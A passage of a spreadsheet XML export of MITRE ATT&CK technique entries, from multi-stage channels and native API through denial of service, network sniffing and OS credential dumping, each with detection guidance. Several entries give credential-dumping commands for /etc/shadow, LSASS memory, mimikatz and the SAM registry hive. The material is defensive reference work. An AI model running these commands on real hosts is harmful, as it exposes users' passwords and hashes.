The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1104</t>
  </si>
  <si>
    <t>Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. Relating subsequent actions that may result from Discovery of the system and network information or Lateral Movement to the originating process may also yield useful data.</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>Native API</t>
  </si>
  <si>
    <t>Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Functionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API &lt;code&gt;CreateProcess()&lt;/code&gt; or GNU &lt;code&gt;fork()&lt;/code&gt; will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)
Higher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)
Adversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. 
Utilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. </t>
  </si>
  <si>
    <t>Module: Module Load, Process: OS API Execution</t>
  </si>
  <si>
    <t>T1599</t>
  </si>
  <si>
    <t>Network Boundary Bridging</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by compromising perimeter network devices. Breaching these devices may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Devices such as routers and firewalls can be used to create boundaries between trusted and untrusted networks.  They achieve this by restricting traffic types to enforce organizational policy in an attempt to reduce the risk inherent in such connections.  Restriction of traffic can be achieved by prohibiting IP addresses, layer 4 protocol ports, or through deep packet inspection to identify applications.  To participate with the rest of the network, these devices can be directly addressable or transparent, but their mode of operation has no bearing on how the adversary can bypass them when compromised.
When an adversary takes control of such a boundary device, they can bypass its policy enforcement to pass normally prohibited traffic across the trust boundary between the two separated networks without hinderance.  By achieving sufficient rights on the device, an adversary can reconfigure the device to allow the traffic they want, allowing them to then further achieve goals such as command and control via [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003) or exfiltration of data via [Traffic Duplication](https://attack.mitre.org/techniques/T1020/001).  In the cases where a border device separates two separate organizations, the adversary can also facilitate lateral movement into new victim environments.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices with out-of-band packet capture or network flow data, using a different device than the one in question.  Look for traffic that should be prohibited by the intended network traffic policy enforcement for the border network device.
Monitor the border network device’s configuration to validate that the policy enforcement sections are what was intended.  Look for rules that are less restrictive, or that allow specific traffic types that were not previously authorized.</t>
  </si>
  <si>
    <t>Firewall, Router ACL</t>
  </si>
  <si>
    <t>T1599.001</t>
  </si>
  <si>
    <t>Network Boundary Bridging: Network Address Translation Traversal</t>
  </si>
  <si>
    <t>Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.
Network devices such as routers and firewalls that connect multiple networks together may implement NAT during the process of passing packets between networks. When performing NAT, the network device will rewrite the source and/or destination addresses of the IP address header. Some network designs require NAT for the packets to cross the border device.  A typical example of this is environments where internal networks make use of non-Internet routable addresses.(Citation: RFC1918)
When an adversary gains control of a network boundary device, they can either leverage existing NAT configurations to send traffic between two separated networks, or they can implement NAT configurations of their own design.  In the case of network designs that require NAT to function, this enables the adversary to overcome inherent routing limitations that would normally prevent them from accessing protected systems behind the border device.  In the case of network designs that do not require NAT, address translation can be used by adversaries to obscure their activities, as changing the addresses of packets that traverse a network boundary device can make monitoring data transmissions more challenging for defenders.  
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to change the operating system of a network device, implementing their own custom NAT mechanisms to further obscure their activities</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1599/001</t>
  </si>
  <si>
    <t>Consider monitoring network traffic on both interfaces of border network devices.  Compare packets transmitted by the device between networks to look for signs of NAT being implemented.  Packets which have their IP addresses changed should still have the same size and contents in the data encapsulated beyond Layer 3.  In some cases, Port Address Translation (PAT) may also be used by an adversary.
Monitor the border network device’s configuration to determine if any unintended NAT rules have been added without authorization.</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
A Network DoS will occur when the bandwidth capacity of the network connection to a system is exhausted due to the volume of malicious traffic directed at the resource or the network connections and network devices the resource relies on. For example, an adversary may send 10Gbps of traffic to a server that is hosted by a network with a 1Gbps connection to the internet. This traffic can be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).
To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets.
Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.
For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498</t>
  </si>
  <si>
    <t>Detection of Network DoS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an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Network Denial of Service: Direct Network Flood</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/001</t>
  </si>
  <si>
    <t>Detection of a network flood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network flood event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Network Denial of Service: Reflection Amplification</t>
  </si>
  <si>
    <t>Adversaries may attempt to cause a denial of service by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflector may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017)
Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase will depending upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild have been documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>Detection of reflection amplification can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect a reflection amplification DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. 
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1046</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Enumeration, Command: Command Execution, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network. 
File sharing over a Windows network occurs over the SMB protocol. (Citation: Wikipedia Shared Resource) (Citation: TechNet Shared Folder) [Net](https://attack.mitre.org/software/S0039) can be used to query a remote system for available shared drives using the &lt;code&gt;net view \\\\remotesystem&lt;/code&gt; command. It can also be used to query shared drives on the local system using &lt;code&gt;net share&lt;/code&gt;.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1135</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</si>
  <si>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</si>
  <si>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T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>Credential Access, Discovery</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>Non-Application Layer Protocol</t>
  </si>
  <si>
    <t>Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)
 Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1095</t>
  </si>
  <si>
    <t>Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)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 
Monitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.</t>
  </si>
  <si>
    <t>T1571</t>
  </si>
  <si>
    <t>Non-Standard Port</t>
  </si>
  <si>
    <t>Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1571</t>
  </si>
  <si>
    <t>Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003</t>
  </si>
  <si>
    <t>### Windows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Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM)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[Mimikatz](https://attack.mitre.org/software/S0002). [PowerShell](https://attack.mitre.org/techniques/T1059/001) scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module, (Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync. (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Note: Domain controllers may not log replication requests originating from the default domain controller account. (Citation: Harmj0y DCSync Sept 2015). Also monitor for network protocols  (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests (Citation: Microsoft SAMR) from IPs not associated with known domain controllers. (Citation: AdSecurity DCSync Sept 2015)
### Linux
To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/&lt;pid&gt;/maps&lt;/code&gt;, where the &lt;code&gt;&lt;pid&gt;&lt;/code&gt;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</si>
  <si>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Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.008</t>
  </si>
  <si>
    <t>OS Credential Dumping: /etc/passwd and /etc/shadow</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to dump the contents of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to enable offline password cracking. Most modern Linux operating systems use a combination of &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt; to store user account information including password hashes in &lt;code&gt;/etc/shadow&lt;/code&gt;. By default, &lt;code&gt;/etc/shadow&lt;/code&gt; is only readable by the root user.(Citation: Linux Password and Shadow File Formats)
The Linux utility, unshadow, can be used to combine the two files in a format suited for password cracking utilities such as John the Ripper:(Citation: nixCraft - John the Ripper) &lt;code&gt;# /usr/bin/unshadow /etc/passwd /etc/shadow &gt; /tmp/crack.password.db&lt;/code&gt;
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/008</t>
  </si>
  <si>
    <t>The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes attempting to access &lt;code&gt;/etc/passwd&lt;/code&gt; and &lt;code&gt;/etc/shadow&lt;/code&gt;, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>T1003.005</t>
  </si>
  <si>
    <t>OS Credential Dumping: Cached Domain Credentials</t>
  </si>
  <si>
    <t>Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable.(Citation: Microsoft - Cached Creds)
On Windows Vista and newer, the hash format is DCC2 (Domain Cached Credentials version 2) hash, also known as MS-Cache v2 hash.(Citation: PassLib mscache) The number of default cached credentials varies and can be altered per system. This hash does not allow pass-the-hash style attacks, and instead requires [Password Cracking](https://attack.mitre.org/techniques/T1110/002) to recover the plaintext password.(Citation: ired mscache)
With SYSTEM access, the tools/utilities such as [Mimikatz](https://attack.mitre.org/software/S0002), [Reg](https://attack.mitre.org/software/S0075), and secretsdump.py can be used to extract the cached credentials.
Note: Cached credentials for Windows Vista are derived using PBKDF2.(Citation: PassLib mscache)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/005</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</si>
  <si>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
Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>OS Credential Dumping: DCSync</t>
  </si>
  <si>
    <t>Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API)(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller using a technique called DCSync.
Members of the Administrators, Domain Admins, and Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data(Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003)(Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098).(Citation: InsiderThreat ChangeNTLM July 2017)
DCSync functionality has been included in the "lsadump" module in [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol.(Citation: Microsoft NRPC Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/006</t>
  </si>
  <si>
    <t>Monitor domain controller logs for replication requests and other unscheduled activity possibly associated with DCSync.(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) Also monitor for network protocols(Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft NRPC Dec 2017) and other replication requests(Citation: Microsoft SAMR) from IPs not associated with known domain controllers.(Citation: AdSecurity DCSync Sept 2015)
Note: Domain controllers may not log replication requests originating from the default domain controller account.(Citation: Harmj0y DCSync Sept 2015)</t>
  </si>
  <si>
    <t>Active Directory: Active Directory Object Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>ExtraHop; Vincent Le Toux</t>
  </si>
  <si>
    <t>T1003.004</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSA Secrets</t>
  </si>
  <si>
    <t>Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at &lt;code&gt;HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets&lt;/code&gt;. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
[Reg](https://attack.mitre.org/software/S0075) can be used to extract from the Registry. [Mimikatz](https://attack.mitre.org/software/S0002) can be used to extract secrets from memory.(Citation: ired Dumping LSA Secrets)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/004</t>
  </si>
  <si>
    <t>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</si>
  <si>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Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>OS Credential Dumping: LSASS Memory</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run using:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
Windows Security Support Provider (SSP) DLLs are loaded into LSSAS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages&lt;/code&gt; and &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages&lt;/code&gt;. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
The following SSPs can be used to access credentials:
* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.
* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)
* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
* CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/001</t>
  </si>
  <si>
    <t>Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
On Windows 8.1 and Windows Server 2012 R2, monitor Windows Logs for LSASS.exe creation to verify that LSASS started as a protected process.
Monitor processes and command-line arguments for program execution that may be indicative of credential dumping. Remote access tools may contain built-in features or incorporate existing tools like Mimikatz. PowerShell scripts also exist that contain credential dumping functionality, such as PowerSploit's Invoke-Mimikatz module,(Citation: Powersploit) which may require additional logging features to be configured in the operating system to collect necessary information for analysis.</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>OS Credential Dumping: NTDS</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in &lt;code&gt;%SystemRoot%\NTDS\Ntds.dit&lt;/code&gt; of a domain controller.(Citation: Wikipedia Active Directory)
In addition to looking for NTDS files on active Domain Controllers, attackers may search for backups that contain the same or similar information.(Citation: Metcalf 2015)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/003</t>
  </si>
  <si>
    <t>14 December 2020</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>OS Credential Dumping: Proc Filesystem</t>
  </si>
  <si>
    <t>Adversaries may gather credentials from information stored in the Proc filesystem or &lt;code&gt;/proc&lt;/code&gt;. The Proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively.
This functionality has been implemented in the MimiPenguin(Citation: MimiPenguin GitHub May 2017), an open source tool inspired by Mimikatz. The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>To obtain the passwords and hashes stored in memory, processes must open a maps file in the /proc filesystem for the process being analyzed. This file is stored under the path &lt;code&gt;/proc/\*/maps&lt;/code&gt;, where the &lt;code&gt;\*&lt;/code&gt; directory is the unique pid of the program being interrogated for such authentication data. The AuditD monitoring tool, which ships stock in many Linux distributions, can be used to watch for hostile processes opening this file in the proc file system, alerting on the pid, process name, and arguments of such programs.</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>OS Credential Dumping: Security Account Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the &lt;code&gt;net user&lt;/code&gt; command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with Reg:
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes: 
* RID 500 account is the local, built-in administrator.
* RID 501 is the guest account.
* User accounts start with a RID of 1,000+.
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>Hash dumpers open the Security Accounts Manager (SAM) on the local file system (&lt;code&gt;%SystemRoot%/system32/config/SAM&lt;/code&gt;) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1027</t>
  </si>
  <si>
    <t>Obfuscated Files or Information</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses. 
